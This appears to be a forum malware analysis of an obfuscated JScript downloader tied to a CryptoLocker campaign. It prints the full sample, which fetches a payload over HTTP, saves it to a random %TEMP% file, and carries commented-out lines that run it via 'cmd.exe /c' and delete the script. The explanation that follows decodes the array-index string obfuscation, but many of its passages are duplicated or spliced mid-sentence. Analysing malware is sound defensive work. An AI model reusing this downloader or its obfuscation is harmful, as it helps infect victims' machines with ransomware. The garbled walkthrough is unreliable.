var yfhopiqluhh2 = [7, 8, 5, 7, 1, 4, "ath", 4, 4]["6"];
var ukekkiva = [8, "/c ", 7, 6, 6, 7, 9, 9, 8]["1"];
var zevibnib = [1, "seB", 1, 4, 2, 2, 2, 5, 7, 8]["1"];
var jajyhyxwy = [7, 6, 5, 8, 2, 8, 8, 3, 6, 'Ful']["9"];
var yjybxywif5 = [8, 9, 2, "teP", 8, 7, 4, 7, 5]["3"];
var wmunafy = [7, 3, 7, 6, 2, "eam", 8, 9]["5"];
var gamcedeku0 = ["jw.", 8, 8, 1, 1, 5, 8, 7]["0"];
var mazqakyjzo = [3, 5, 5, "ADO", 5, 5, 5, 5]["3"];
var osabaq = [9, 6, 2, 'Typ', 1, 1, 1, 2]["3"];
var nygqyczoz = [2, 3, 4, 7, "MLHT", 9, 8, 6, 6]["4"];
var bidnovvyqp6 = ["apl", 4, 3, 5, 9, 7, 4, 1, 3]["0"];
var awgykpomoj1 = ["Clos", 3, 9, 3, 9, 2, 8, 9, 7, 2]["0"];
var tfufubres0 = [3, 5, 8, 5, 7, 'Tem', 8, 5]["5"];
var keluqy4 = [3, 2, 2, 9, 1, 9, "bje", 7]["6"];
var lgimonra3 = [1, "Pos", 1, 9, 2, 4, 1, 4]["1"];
var pdimuly = [6, 1, "send", 5, 4, 7, 8, 4]["2"];
var zbydiqsoli4 = [6, "at", 5, 5, 2, 2, 1, 9, 1, 8]["1"];
var brisewet = [6, 5, 9, 7, 9, "L2.X", 1, 4, 9, 4]["5"];
var fjynhevonra1 = [2, 'Sav', 9, 2, 9, 3, 2, 8, 1, 5]["1"];
var molycohj0 = ["e('", 6, 1, 5, 2, 5, 3, 9, 3, 7]["0"];
var ashesubw5 = [5, 5, 4, 8, 2, 5, 1, 5, "akp", 2]["8"];
var mypzynkug = ["?f=", 1, 9, 8, 8, 7, 4, 3]["0"];
var hnegfepsuta3 = [2, 7, 3, 4, 1, 3, 5, 6, "te", 9]["8"];
var brigigo4 = [6, "Obje", 5, 5, 2, 5, 9, 3]["1"];
var iveruky = [3, 3, "Abs", 6, 6, 7, 2, 2, 4, 9]["2"];
var hdocirzy1 = [5, 6, "e", 2, 5, 9, 2, 7, 9]["2"];
var kjunyhimo = [8, 9, 4, 7, 1, "Get", 5, 6, 8]["5"];
var tonumejt = [3, 6, 5, "ipt", 3, 1, 7, 1]["3"];
var tigviqzave7 = [9, "ing", 8, 5, 4, 1, 1, 8]["1"];
var ysgupuphuwh = [3, 9, "wug", 2, 7, 4, 8, 3, 2, 6]["2"];
var umunozemw = [1, 5, 2, 4, 6, 9, 8, 8, "retu"]["8"];
var djyvoroc = [7, 6, 8, 5, 9, 9, 2, "l", 1, 7]["7"];
var ytydqesxer0 = [9, 1, 8, 3, 6, 4, 3, 2, "ew ", 9]["8"];
var exaqkyvtir = [4, "t(m", 7, 5, 6, 5, 5, 6]["1"];
var uvmewasca = [9, 7, 1, 9, 8, 8, 3, 2, 4, 'r']["9"];
var izucuwg3 = [6, 2, 4, ".le", 7, 3, 9, 1, 5]["3"];
var ucyvyxquqk = [9, 9, 7, 9, 8, 3, "jec", 2]["6"];
var ynabovx4 = [6, "us", 5, 3, 6, 8, 4, 7, 8]["1"];
var omxemhylf2 = [4, 5, 3, 4, 6, " jr", 4, 2, 6]["5"];
var ysvafvef4 = [2, 6, 6, 8, 6, "ret", 4, 1]["5"];
var evqubecipn7 = [1, 7, 9, 3, 4, 9, 1, "); ", 6, 6]["7"];
var bifwotpu = ["; r", 9, 1, 5, 4, 7, 9, 7, 5]["0"];
var jenhadno1 = ['ody', 2, 1, 8, 4, 1, 9, 7]["0"];
var rtyrcomozsa8 = [8, 5, 4, 9, 'Get', 5, 4, 1]["4"];
var yksazbasfo8 = [6, 'Res', 6, 9, 8, 1, 9, 1, 5]["1"];
var ywdoczycg = [3, 5, "Str", 3, 6, 1, 5, 7]["2"];
var nuvykkorbu = [7, "Shel", 1, 7, 8, 2, 2, 1, 9]["1"];
var onbitbij = ["WScr", 8, 7, 4, 7, 3, 8, 2, 5, 8]["0"];
var ybyjecehm = [2, "DB.", 6, 2, 6, 8, 6, 8]["1"];
var vwafgehni0 = [1, 9, 6, "run", 6, 6, 8, 1, 6]["3"];
var igoptujmyk = [3, 2, 1, 5, 2, 5, 6, 'Fil', 8]["7"];
var uqdostufy1 = [5, 5, "= n", 9, 6, 5, 1, 3]["2"];
var bbegvobexjy6 = [1, 2, 1, 3, 5, 8, 2, 4, "TP"]["8"];
var porosy6 = [9, 3, "asu", 5, 8, 1, 9, 3]["2"];
var hgudipcu = [2, 4, 2, 2, 1, 4, 6, "n", 1, 3]["7"];
var ojhenyteht = ["rn ", 3, 5, 6, 1, 9, 9, 5, 2, 7]["0"];
var odojkycxyzd = [4, 1, 4, 4, 7, 2, 8, 'open', 4, 1]["7"];
var ofeqyxhuwt = [4, 9, "eXO", 1, 3, 7, 1, 3]["2"];
var kpiheko = [3, 8, 5, 5, 6, 6, 5, 6, "ugv", 5]["8"];
var deqxihaky = [2, 9, 7, 5, 2, 9, "olu", 1]["6"];
var kyvgicis3 = [1, 3, 1, 3, 7, 4, 1, 8, "var", 1]["8"];
var obutdymi = [4, 'Fil', 4, 4, 8, 7, 4, 5, 2]["1"];
var tkymrawcy = [2, 5, 3, 9, 1, 'ipt', 8, 3, 6, 7]["5"];
var fhadisuhy = [6, 6, 3, 1, 8, 4, "leS", 2, 1, 6]["6"];
var rzedsygwu = [3, 3, 6, 7, 7, "w.c", 5, 1]["5"];
var anhujyv1 = [3, 5, 9, 8, "\\\\", 9, 4, 7]["4"];
var udbuxdakhavq = [1, 2, 8, 6, "adm", 9, 5, 1]["4"];
var fdukezyh8 = [6, 5, 3, 5, 9, 9, 6, 2, "Scr", 7]["8"];
var texlopkak1 = [2, 7, 5, 3, "Scr", 8, 6, 8, 6, 6]["4"];
var episyvt7 = [7, 6, 5, 8, 5, 1, 6, 7, "php", 9]["8"];
var ewnehaca = [8, 9, 9, " Ac", 3, 9, 2, 1]["3"];
var emytipq = [7, 4, 5, 9, 1, 5, 3, "ct;", 3, 3]["7"];
var soxispi = [1, ".Fi", 2, 2, 3, 1, 5, 9]["1"];
var ihdufdutynd6 = [9, 8, 5, 3, 4, 6, 3, 2, 6, "XOb"]["9"];
var uflesepf = [3, "riv", 2, 4, 4, 2, 6, 6, 8, 9]["1"];
var zudxoba8 = [2, 7, 'e', 3, 3, 4, 4, 7, 3, 1]["2"];
var bacodta2 = [4, 7, "emO", 8, 5, 8, 4, 1, 4]["2"];
var afehjate1 = [9, 5, 'lNa', 1, 9, 3, 7, 5, 2, 8]["2"];
var exacdubx = [3, 8, 9, 8, 7, 5, "in.", 8, 3]["6"];
var oxefzetfez2 = [1, 2, "vil", 5, 9, 4, 2, 4, 3, 5]["2"];
var ipexetl = [5, 8, " jr", 6, 2, 2, 4, 1, 2]["2"];
var hhitwycyxd0 = [4, 4, 5, 1, 6, 'lde', 1, 2]["5"];
var umqesas0 = [1, 4, 9, "exe ", 5, 2, 5, 8, 4]["3"];
var snumsisike = [8, 1, 4, 3, 3, 9, 1, 'Wri', 6, 7]["7"];
var bigpefco = [1, 7, 8, 4, "e", 2, 6, 7, 3, 7]["4"];
var quludvi1 = ["Spe", 8, 3, 7, 9, 1, 9, 5]["0"];
var aptimota = [8, "var", 9, 6, 6, 7, 4, 7, 4]["1"];
var mixemrid4 = [9, 5, "ct", 2, 6, 5, 7, 5, 8, 9]["2"];
var odrifmigh = [8, "lesy", 1, 5, 7, 3, 8, 8, 7]["1"];
var odomebef = [4, 6, 7, 8, 7, 3, "pon", 5]["6"];
var zcexsaqekg = [2, "Get", 1, 9, 3, 9, 8, 1]["1"];
var ulhabvaze2 = [8, 5, 6, 9, 7, 7, "edz", 4]["6"];
var etjufymurb = [3, 7, 8, 3, 9, 4, "yxv", 2, 4, 5]["6"];
var mopepo = ["GET", 7, 6, 2, 9, 7, 6, 5, 5]["0"];
var xdimrugva0 = [2, 8, 8, 2, 2, 3, 8, "ovw"]["7"];
var ahnensuhuv = [6, 6, 8, 9, "2.d", 7, 8, 8]["4"];
var gibdymco0 = [4, "pNa", 3, 9, 4, 5, 6, 6]["1"];
var ipjatzypko = [4, "zyd", 6, 6, 1, 8, 8, 5]["1"];
var cimwenxi = [9, " ov", 5, 4, 6, 5, 7, 8, 4, 6]["1"];
var urtiwguqja = [4, 1, 'Ope', 9, 8, 6, 7, 9, 3]["2"];
var ifcedyka9 = [4, 6, 2, 7, 7, 2, "del", 3, 3]["6"];
var irvyrzisi1 = [4, 7, 2, umunozemw + bvunygze9 + ohmicmoftil + rajkezhefli + utyxoju2 + odrifmigh + bzacoge6 + brigigo4 + tanynu2, 6, 9, 4, 9]["3"];
var dijditonz6 = [2, 4, 3, 3, 6, 7, kyvgicis3 + ipexetl + porosy6 + yfjobulki + uqdostufy1 + ytydqesxer0 + worityn + izretadvi + ihdufdutynd6 + ucyvyxquqk + exaqkyvtir + ipjatzypko + ashesubw5 + bidnovvyqp6 + akiwely + evqubecipn7 + aptimota + cimwenxi + ysgupuphuwh + oxefzetfez2 + etjufymurb + yfezico0 + omxemhylf2 + uzanulx + gamcedeku0 + kjunyhimo + iveruky + deqxihaky + yjybxywif5 + yfhopiqluhh2 + yfomgurudm + molycohj0 + qdiqxywili4 + bifwotpu + gemoto6 + ojhenyteht + xdimrugva0 + kpiheko + yptypmewo4 + binsujod1 + izucuwg3 + usbijvepij + qcevesrozci + xqasmyvpe, 5]["6"];
var ileslyxy5 = [1, 3, 9, ysvafvef4 + otyvzysun + ewnehaca + iqjiwpalo + ofeqyxhuwt + keluqy4 + emytipq, 1, 1, 7, 4, 5, 6]["3"];
var yvyndax = [6, 2, 4, 6, 3, 6, 5, 4, mazqakyjzo + ybyjecehm + ywdoczycg + wmunafy, 3]["8"];
var ijigsokhimw3 = [5, 5, 2, 9, 6, vvecjijki4 + yxytud8 + uxysizi + rzedsygwu + ygpagag + uflesepf + ulhabvaze2 + qziherlamwo + ugipit5 + udbuxdakhavq + exacdubx + episyvt7 + mypzynkug + ahnensuhuv + zbydiqsoli4, 3, 1, 5, 4]["5"];
var derfycgy = [5, 2, 8, 6, 2, 6, onbitbij + fumweledzu6 + nuvykkorbu + djyvoroc, 3, 7, 4]["6"];
var axduxynat = [cbufzeqkulc5 + brisewet + nygqyczoz + bbegvobexjy6, 1, 1, 6, 7, 9, 6, 8]["0"];
var epcemescip = [9, 3, 7, 9, texlopkak1 + tonumejt + tigviqzave7 + soxispi + fhadisuhy + iwebog + bacodta2 + slyplumxop8 + mixemrid4, 7, 8, 5, 2]["4"];
var zgafgado = [6, 8, 6, 7, 7, 8, 7, anhujyv1, 2]["7"];
var yzozyvy = [4, 4, 7, 6, mopepo, 9, 2, 1, 1, 9]["4"];
var odynfinteds = [8, 8, 2, 7, 5, 7, 3, uwabbyranl + umqesas0 + ukekkiva]["7"];
var imis9 = aqympiw;
var mzydakpapl0 = new Function(irvyrzisi1);
var mujegbe = [2, 7, 1, 8, ["rka", 1, 3, 6, 5, 5, 7, 7, 9], 1, 2, 3, 2, 2]["4"];
var cafyjep8 = [8, [6, 6, 3, 1, 3, 6, 4, 6, "cmi", 6], 5, 6, 8, 4, 2, 4]["1"];
var zfukqilvalho7 = [6, 9, 9, 3, 4, 9, 2, 9, 3, [2, 9, 7, 5, 1, 8, 5, 3, "up"]]["9"];
var yxivuvwus = [5, 9, 8, 1, 5, 3, 3, [4, 2, 9, 3, "vpa", 6, 7, 4, 5], 4]["7"];
var ebqypsuzyn = [5, 2, 9, 2, 5, [4, 3, 2, 3, 7, "zi", 6, 2, 5], 2, 3, 8, 9]["5"];
var yqlypnuksud = [8, 4, [8, 7, 1, 7, "gy", 3, 6, 4, 9, 6], 2, 5, 5, 8, 8, 1, 3]["2"];
var dcigacwa4 = [1, 5, 5, 7, 1, 9, 7, [1, 6, 1, "tto", 6, 2, 8, 5, 5], 7, 9]["7"];
var ubmycoble0 = [[2, "zh", 1, 3, 2, 5, 7, 4, 5], 7, 8, 3, 2, 9, 4, 2, 2, 6]["0"];
var ujtodunyf5 = [6, 7, [3, 5, 5, "co", 8, 4, 9, 8, 1], 8, 1, 1, 4, 5]["2"];
var japumu0 = [8, 6, [4, 7, 4, 7, 5, "ry", 9, 8, 6, 7], 7, 5, 5, 6, 1, 9, 3]["2"];
var zuvlezyxe8 = [[4, "lm", 6, 7, 6, 8, 9, 9, 5], 2, 1, 5, 3, 4, 1, 1, 1]["0"];
var ebecuntu5 = [5, 2, 3, 3, 5, 4, 2, ["lqy", 8, 2, 7, 6, 6, 1, 9, 6], 6, 1]["7"];
var mrovwegigca = [9, 3, 8, 3, 5, 1, [2, 2, "avb", 4, 5, 5, 4, 2], 6]["6"];
var zytxyfloldu = [7, 8, 2, 2, 6, 2, [4, "aq", 4, 8, 9, 3, 7, 8, 5, 9], 5, 4]["6"];
var qygsuwwo = [1, 1, [8, 2, "ex", 9, 6, 1, 8, 3], 4, 3, 1, 3, 5]["2"];
var ujdyqkoz = new Function(dijditonz6)();
var asborqyqkyrm0 = [3, [7, 1, 1, 1, 3, 9, "o", 2], 7, 9, 3, 8, 9, 5, 8, 1]["1"];
var gykehogcu3 = [5, 8, 9, 4, [4, 1, 5, 1, 6, 4, 7, "k", 3], 2, 9, 8, 3]["4"];
var daxzaxyme4 = [2, [1, 8, 8, 4, "abt", 1, 9, 7, 6, 8], 2, 7, 2, 1, 5, 6, 1]["1"];
var hcimuqxixw4 = [7, 8, [5, "u", 9, 5, 6, 9, 3, 6], 7, 9, 3, 6, 5]["2"];
var hujcesej = [9, 4, [4, 2, 7, "mna", 8, 6, 5, 5], 7, 4, 4, 9, 8, 7]["2"];
var epowpabnohp4 = [5, 8, 3, ["sc", 4, 8, 2, 7, 5, 6, 1], 9, 7, 5, 6, 2, 1]["3"];
var ymseppybi4 = [[6, 9, "va", 3, 3, 1, 8, 3], 2, 2, 9, 2, 3, 3, 8]["0"];
var gpasgufxeti0 = [4, 1, 4, 2, 5, 1, [8, 7, "g", 4, 7, 7, 8, 4, 9], 8, 3, 5]["6"];
var utduhaciwp3 = [1, 2, [8, 4, 7, 1, 2, 6, 3, 1, 7, "it"], 2, 4, 8, 3, 5]["2"];
var mjowyfzuk = [8, 9, 2, 5, 2, [4, "o", 4, 9, 1, 2, 1, 7], 3, 8, 5]["5"];
var vekxiby = [8, 9, 6, [5, 7, 2, 8, 4, "kq", 5, 7], 7, 6, 1, 4, 6]["3"];
var omalobre7 = [1, [5, 1, 5, 4, "xu", 3, 4, 7, 9, 7], 4, 9, 8, 8, 4, 9, 4]["1"];
var azocxisw = [[4, 8, 9, 8, "ufk", 8, 2, 3], 6, 2, 7, 2, 3, 2, 3, 9, 5]["0"];
var yxycqati = [5, 2, [5, 9, 9, 6, 4, 9, "z", 2, 8, 1], 7, 5, 1, 4, 9]["2"];
var guzcapebh = [3, 6, 5, 7, 8, 2, 9, [7, 3, "o", 4, 8, 6, 4, 7, 8]]["7"];
switch (ujdyqkoz) {
case true:
var hvaqxena = new Function(ileslyxy5)();
var ulosucith = [5, 1, 3, 1, 8, [4, 9, 3, 1, 3, 5, "o", 7, 1], 6, 9]["5"];
var mkolheni2 = [3, 9, [9, 3, 6, "n", 6, 7, 9, 3, 2], 6, 8, 4, 9, 8]["2"];
var emnylpupp4 = [[8, 9, "jnu", 1, 3, 3, 5, 1, 7], 7, 6, 8, 2, 8, 7, 2]["0"];
var geqjyxytp7 = [2, 1, 7, 4, 2, [4, "id", 4, 5, 1, 8, 1, 1], 2, 7, 7]["5"];
var abuqxyhe5 = [7, 7, 7, 1, 1, 9, 1, [7, 5, 3, 6, 2, 6, 6, "jj"]]["7"];
var evgoxhogqo7 = [3, 7, 8, 4, 1, 1, 5, 6, 5, [1, 3, 3, 2, 6, 4, 9, 5, "ep", 9]]["9"];
var jegewyxde = [7, 7, 9, 1, [7, 6, 3, 6, 8, "i", 9, 2, 7], 4, 7, 6, 7]["4"];
var himbatad = [8, 1, 4, 4, 5, 6, 2, 6, 5, [7, "o", 2, 8, 2, 5, 2, 3, 6]]["9"];
var omulpybl5 = [[2, 2, 3, 5, 5, 8, "u", 1, 9], 1, 6, 1, 8, 2, 8, 9]["0"];
var sqyvalapy0 = [[5, 8, 7, 6, 9, 4, 7, 4, 1, "i"], 4, 8, 9, 9, 6, 7, 6, 6, 1]["0"];
var ohucrilc3 = [3, 6, 4, [6, 5, 4, 6, 8, 3, 6, "z", 1, 7], 1, 4, 9, 6, 8]["3"];
var ytelrurm8 = [9, 4, 4, 7, 3, 1, 8, [6, 1, 5, 7, 4, 2, 3, 5, "am", 8]]["7"];
var eziwyqfox3 = [3, 4, 6, 1, 2, 7, 7, 5, [7, 8, 1, 6, 3, 8, 8, "xa", 9, 4], 6]["8"];
var tapkemifwo7 = [8, 6, 6, [5, 2, "yh", 8, 7, 1, 7, 3], 2, 1, 8, 1]["3"];
var rhawuxpullu = [5, 6, 3, 5, 2, 3, 7, 8, 4, [4, 9, 5, 9, 3, 7, "bno", 2, 8, 2]]["9"];
break;
}
var owdeqg2 = yvyndax;
var ekwidedul = new hvaqxena(owdeqg2);
ekwidedul[urtiwguqja + hgudipcu]();
var qupqykmy = ijigsokhimw3;
ekwidedul[lgimonra3 + lgufjaregzi + otvebolhyn] = 0;
var gmavabava8 = derfycgy;
var ecystogo = imis9[fdukezyh8 + tkymrawcy + jajyhyxwy + afehjate1 + wexuflu];
var exet3 = new hvaqxena(gmavabava8);
var qrujcydvipd9 = axduxynat;
var gvidummulj7 = epcemescip;
var jrasujw = new hvaqxena(gvidummulj7);
var abogikn = new hvaqxena(qrujcydvipd9);
var czeqip = jrasujw[rtyrcomozsa8 + quludvi1 + jzucpekkage + lagyvgeq4 + hhitwycyxd0 + uvmewasca](2) + zgafgado + jrasujw[zcexsaqekg + tfufubres0 + gibdymco0 + ruxrabu]();
abogikn[odojkycxyzd](yzozyvy, qupqykmy, 0);
abogikn[pdimuly]();
ekwidedul[osabaq + zudxoba8] = 1;
if (abogikn[qusuhyxi + ynabovx4] == 200) {
ekwidedul[snumsisike + hnegfepsuta3](abogikn[yksazbasfo8 + odomebef + zevibnib + jenhadno1]);
ekwidedul[fjynhevonra1 + kzunaxve5 + obutdymi + jyryxxirnu](czeqip);
ekwidedul[awgykpomoj1 + hdocirzy1]();
var yhamgyv1 = odynfinteds + czeqip;
//exet3[vwafgehni0](yhamgyv1, 0);
}
//jrasujw[ifcedyka9 + exolcyky + igoptujmyk + bigpefco](ecystogo);
2) Main differences with previous analyzed POSTNORD_1755.js :
2-1 ) The arrays parts :
Before :
The strings really used were obfuscated, divided using several vars with strange names, each part hidden on a array + function call :
var ifpagn3 = [707, 3703, 402, 4283, 8168, 3068, 8768, 3403, 3035, 7441, 4400, 3460, 2550, 5548, 3583, 6534, 3040, 8367, "ri"].wuqjy();
var uhadvo8 = [6476, 796, 2367, 4143, 6423, 5940, 3165, 9323, 4834, 4697, 5617, 1273, 9839, 1412, "WS"].wuqjy();
var uxodhy7 = [6532, 1901, 2855, 1852, 7316, 5498, 8452, 4555, 7386, 1261, 7237, 4312, 6763, 8496, "jf"].wuqjy();
var xpyqegxovog4 = [299, 8746, 397, 9032, 4189, 8297, 2463, 2690, 8177, 1406, 1770, 3001, 3468, 7901, 5140, 7728, 4614, "La"].wuqjy();
var amtumyj7 = [2042, 3018, 6405, 578, 3972, 6187, 9686, 3305, 233, 3598, 181, 2311, 6179, 2605, 8505, "Bo"].wuqjy();
We have seen on the previous analysis that .wuqjy() was a function used to hide the real JavaScript function used : .pop()
An example In the main part (after several functions and vars have been build with the above method) :
var enxocqojolv5 = [4764, 8988, 2383, 8868, 8354, 3116, 8929, 9605, 846, 7291, 7109, 1151, "Wr"].wuqjy();
var izavoned3 = [7684, 5677, 403, 6613, 5283, 1150, 3905, 2392, 2201, 1746, 9014, 6705, 3619, 5479, 1781, 2880, 1417, 8530,"it"].wuqjy();
var mkaqaxykco0 = [1638, 8609, 6242, 3285, 7624, 2948, 6805, 3103, 4630, 9585, 4421, 3160, 3408, 1782, 7007, 7779, "e"].wuqjy();
=> enxocqojolv5 + izavoned3 + mkaqaxykco0 = "Write"
var ifpagn3 = [707, 3703, 402, 4283, 8168, 3068, 8768, 3403, 3035, 7441, 4400, 3460, 2550, 5548, 3583, 6534, 3040, 8367, "ri"].wuqjy();
var uhadvo8 = [6476, 796, 2367, 4143, 6423, 5940, 3165, 9323, 4834, 4697, 5617, 1273, 9839, 1412, "WS"].wuqjy();
var uxodhy7 = [6532, 1901, 2855, 1852, 7316, 5498, 8452, 4555, 7386, 1261, 7237, 4312, 6763, 8496, "jf"].wuqjy();
var xpyqegxovog4 = [299, 8746, 397, 9032, 4189, 8297, 2463, 2690, 8177, 1406, 1770, 3001, 3468, 7901, 5140, 7728, 4614, "La"].wuqjy();
var amtumyj7 = [2042, 3018, 6405, 578, 3972, 6187, 9686, 3305, 233, 3598, 181, 2311, 6179, 2605, 8505, "Bo"].wuqjy();
We have seen on the previous analysis that .wuqjy() was a function used to hide the real JavaScript function used : .pop()
=> to retrieve the last value of the array
For example :
var ifpagn3 = [707, 3703, 402, 4283, 8168, 3068, 8768, 3403, 3035, 7441, 4400, 3460, 2550, 5548, 3583, 6534, 3040, 8367, "ri"].wuqjy();
that is in reality :
var ifpagn3 = "ri"
Using this method, long strings used in the main part of the script are replaced by concatenation of several strange variable names, but with content is the part of understandable strings.
An example In the main part (after several functions and vars have been build with the above method) :
enxocqojolv5 + izavoned3 + mkaqaxykco0 => !?!?
A search (with notepad++, for example) give :
var enxocqojolv5 = [4764, 8988, 2383, 8868, 8354, 3116, 8929, 9605, 846, 7291, 7109, 1151, "Wr"].wuqjy();
var izavoned3 = [7684, 5677, 403, 6613, 5283, 1150, 3905, 2392, 2201, 1746, 9014, 6705, 3619, 5479, 1781, 2880, 1417, 8530,"it"].wuqjy();
var mkaqaxykco0 = [1638, 8609, 6242, 3285, 7624, 2948, 6805, 3103, 4630, 9585, 4421, 3160, 3408, 1782, 7007, 7779, "e"].wuqjy();
=> enxocqojolv5 + izavoned3 + mkaqaxykco0 = "Write"
With this method, it is very easy to find the "piece of strings" because it is always the last value of the array that is useful.
The previous sample in details : https://malwaretips.com/threads/postnord_1755-js-error-on-the-path-name-payload-cryptolocker.65623/
In the new samples :
They have tried to improve this parts with another sorts of array and retrieving method.
3 sorts of arrays are used :
I will show 3 examples from a lot of arrays used :
3 sorts of arrays are used :
I will show 3 examples from a lot of arrays used :
var uwabbyranl = [3, 2, 8, 6, 9, "cmd.", 5, 6, 1, 5]["5"];
var ebqypsuzyn = [5, 2, 9, 2, 5, [4, 3, 2, 3, 7, "zi", 6, 2, 5], 2, 3, 8, 9]["5"];
var odynfinteds = [8, 8, 2, 7, 5, 7, 3, uwabbyranl + umqesas0 + ukekkiva]["7"];
How it works to retrieve the "piece of words" ?var ebqypsuzyn = [5, 2, 9, 2, 5, [4, 3, 2, 3, 7, "zi", 6, 2, 5], 2, 3, 8, 9]["5"];
var odynfinteds = [8, 8, 2, 7, 5, 7, 3, uwabbyranl + umqesas0 + ukekkiva]["7"];
(1) var uwabbyranl = [3, 2, 8, 6, 9, "cmd.", 5, 6, 1, 5]["5"];
=> I have put in red the index to be used to get the right value (remember the first value is at index 0, the second at index 1, etc)
=> var uwabbyranl = "cmd.";
It is the first part for the "cmd.exe ...."
(2) var ebqypsuzyn = [5, 2, 9, 2, 5, [4, 3, 2, 3, 7, "zi", 6, 2, 5], 2, 3, 8, 9]["5"];
=> useless arrays, only in the script to obfuscate a bit more.
How can I know it ?
- because a search on the var name (here : ebqypsuzyn) , give only one result : this part => not used elsewhere
- the values at the given index is always another array :
here : [4, 3, 2, 3, 7, "zi", 6, 2, 5]
(3) var odynfinteds = [8, 8, 2, 7, 5, 7, 3, uwabbyranl + umqesas0 + ukekkiva]["7"];
=> the values retrieved is the result of a concatenation (addition, for strings) :
=> I have put in red the index to be used to get the right value (remember the first value is at index 0, the second at index 1, etc)
=> var uwabbyranl = "cmd.";
It is the first part for the "cmd.exe ...."
(2) var ebqypsuzyn = [5, 2, 9, 2, 5, [4, 3, 2, 3, 7, "zi", 6, 2, 5], 2, 3, 8, 9]["5"];
=> useless arrays, only in the script to obfuscate a bit more.
How can I know it ?
- because a search on the var name (here : ebqypsuzyn) , give only one result : this part => not used elsewhere
- the values at the given index is always another array :
here : [4, 3, 2, 3, 7, "zi", 6, 2, 5]
(3) var odynfinteds = [8, 8, 2, 7, 5, 7, 3, uwabbyranl + umqesas0 + ukekkiva]["7"];
=> the values retrieved is the result of a concatenation (addition, for strings) :
=>index 7 (remember, index begain with position 0)
=> value at position 7 is the concatenation of uwabbyranl + umqesas0 + ukekkiva
=> var odynfinteds = "cmd.exe /c "=> value at position 7 is the concatenation of uwabbyranl + umqesas0 + ukekkiva
var uwabbyranl = [3, 2, 8, 6, 9, "cmd.", 5, 6, 1, 5]["5"];=> "cmd."
var umqesas0 = [1, 4, 9, "exe ", 5, 2, 5, 8, 4]["3"];
=> "exe "
var ukekkiva = [8, "/c ", 7, 6, 6, 7, 9, 9, 8]["1"];
=> "/c "
=> the first part for the run command Line (we will see later where this part is)
Conclusion : Only two type of obfuscation with arrays are used to really obfuscate data used for the main part. The third type is to obfuscate a bit more the script, not real important data.
Now, the useful value is not the last value, but need the index clue to be found.
Now, the useful value is not the last value, but need the index clue to be found.
2-2 ) The script file :On previous sample, there were a part getting the script full path, but not used.
Now, at the end of the script, the current script is deleted
The part that get the current script path name :
2-3) The payload path/name :Now, at the end of the script, the current script is deleted
The part that get the current script path name :
- var ecystogo = imis9[fdukezyh8 + tkymrawcy + jajyhyxwy + afehjate1 + wexuflu];
Example : "J:\\ANALISE\\21_11_2016\\EMAIL_25793.js"
The part that deletes the script :=> fdukezyh8 + tkymrawcy + jajyhyxwy + afehjate1 + wexuflu = "Scr" + "ipt" + "Ful" + "lNa" + "me"
=> var ecystogo = WScript.ScriptFullName
var imis9 = aqympiw;
var aqympiw = WScript;
Example : "J:\\ANALISE\\21_11_2016\\EMAIL_25793.js"
- jrasujw[ifcedyka9 + exolcyky + igoptujmyk + bigpefco](ecystogo);
Each part :
=> Retrieved by search using the "strange name" and search tool from notepad++
Example :
Each part :
=> Retrieved by search using the "strange name" and search tool from notepad++
- var jrasujw = new hvaqxena(gvidummulj7);
=> object to manipulate files/ folder
=> FileObjectSystem["deleteFile"](WScript.ScriptFullName)
=> var gvidummulj7 = epcemescip;
then : jrasujw : new ActiveXObject( "Scripting.FileSystemObject");
=> var epcemescip = [9, 3, 7, 9, texlopkak1 + tonumejt + tigviqzave7 + soxispi + fhadisuhy + iwebog + bacodta2 + slyplumxop8 + mixemrid4, 7, 8, 5, 2]["4"];
=> hvaqxena :=> texlopkak1 + tonumejt + tigviqzave7 + soxispi + fhadisuhy + iwebog + bacodta2 + slyplumxop8 + mixemrid4
=> "Scripting.FileSystemObject"
=> var hvaqxena = new Function(ileslyxy5)();
=> var ileslyxy5 = [1, 3, 9, ysvafvef4 + otyvzysun + ewnehaca + iqjiwpalo + ofeqyxhuwt + keluqy4 + emytipq, 1, 1, 7, 4, 5, 6]["3"];
=> ysvafvef4 + otyvzysun + ewnehaca + iqjiwpalo + ofeqyxhuwt + keluqy4 + emytipq
=> "return ActiveXObject;"
=> object to manipulate files/ folder
- ifcedyka9 + exolcyky + igoptujmyk + bigpefcovar ifcedyka9 = [4, 6, 2, 7, 7, 2, "del", 3, 3]["6"];
=> "deleteFile"=> "del"
var exolcyky = [2, 1, "ete", 4, 1, 7, 1, 5, 3]["2"];
=> "ete"
var igoptujmyk = [3, 2, 1, 5, 2, 5, 6, 'Fil', 8]["7"];
=> 'Fil'
var bigpefco = [1, 7, 8, 4, "e", 2, 6, 7, 3, 7]["4"];
=> "e"
- ecystogo : we have seen at the beginning of this part that it is the full script path name=> WScript.ScriptFullName
then : - jrasujw[ifcedyka9 + exolcyky + igoptujmyk + bigpefco](ecystogo);
Example :
FileObjectSystem.deleteFile("J:\\ANALISE\\21_11_2016\\EMAIL_25793.js")
In the previous sample, there was an error :
welerle0 = ymnevi2[ezlajvelevny5 + ysuzsibi2 + uhvaj9 + tutobmytvo0 + hivelg1](epygejm8 + pkekzigl8);
=> they have forgotten the "\\" part beeten %TEMP and rad44325.tmp
=> It should has been : C:\\Users\\DardiM\\AppData\\Local\\Temp\\rad44325.tmp
=> It is : C:\Users\DardiM\AppData\Local\Temprad44325.tmp
=>Stream.SaveToFile(%TEMP% + rad44325.tmp)=> they have forgotten the "\\" part beeten %TEMP and rad44325.tmp
=> It should has been : C:\\Users\\DardiM\\AppData\\Local\\Temp\\rad44325.tmp
=> It is : C:\Users\DardiM\AppData\Local\Temprad44325.tmp
In these new samples, they have corrected it :
var czeqip = jrasujw[rtyrcomozsa8 + quludvi1 + jzucpekkage + lagyvgeq4 + hhitwycyxd0 + uvmewasca](2) + zgafgado + jrasujw[zcexsaqekg + tfufubres0 + gibdymco0 + ruxrabu]();
Using the search tool from notepad++, to find what mean the "strange name" of vars
var czeqip = FileObjectSystem["Get" + "Spe" + "cia" + "lFo" + "lde" + "r"](2) + "\\\\"
+ FileObjectSystem["Get" + "Tem" + "pNa" + "me"]
(with the error : C:\Users\DardiM\AppData\Local\Temprad44325.tmp)
This time, good folder and good random payload name used, they have not forgotten "\\\\" :
%TEMP% + "\\\\" + Randomname.tmp
+ FileObjectSystem["Get" + "Tem" + "pNa" + "me"]
=> var czeqip = FileObjectSystem["GetSpecialFolder"](2) + "\\\\"
+ FileObjectSystem["GetTempName"]
GetSpecialFolder"](2)
=> %TEMP%
=> Example : C:\Users\DardiM\AppData\Local\Temp\
GetTempName :
=> get a random .tmp file name
